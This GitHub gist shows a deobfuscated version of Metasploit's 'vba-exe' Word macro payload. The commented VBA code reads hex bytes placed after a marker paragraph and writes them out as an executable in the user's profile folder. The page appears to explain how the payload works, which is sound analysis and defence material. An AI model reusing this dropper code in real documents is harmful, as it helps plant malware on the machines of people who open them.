-
-
Save BeyondCy/87580726ea3fd64e625b41be7fdb829c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload | |
| ' | |
| ' This macro searches for a marker paragraph, namely "marker" in the example below | |
| ' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to | |
| ' a local file. | |
| ' | |
| ' Example, in the word document: | |
| ' marker | |
| ' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 .... | |
| Sub DecodeAndSaveEmbeddedFile() | |
| Dim p As Paragraph | |
| Dim Text As String | |
| Dim MarkerFound As Boolean | |
| Dim Counter As Integer | |
| Dim FileHandle As Integer | |
| Dim b As Byte | |
| Dim UserProfile As String | |
| UserProfile = Environ("USERPROFILE") | |
| FileHandle = FreeFile() | |
| Open UserProfile + "\whatever.exe" For Binary As FileHandle | |
| For Each p In ActiveDocument.Paragraphs | |
| DoEvents | |
| Text = p.Range.Text | |
| If (MarkerFound = True) Then | |
| Counter = 1 | |
| While (Counter < Len(Text)) | |
| b = Mid(Text, Counter, 4) | |
| Put #FileHandle, , b | |
| Counter = Counter + 4 | |
| Wend | |
| ElseIf (InStr(1, Text, "marker") > 0 And Len(Text) > 0) Then | |
| MarkerFound = True | |
| End If | |
| Next | |
| Close #FileHandle | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment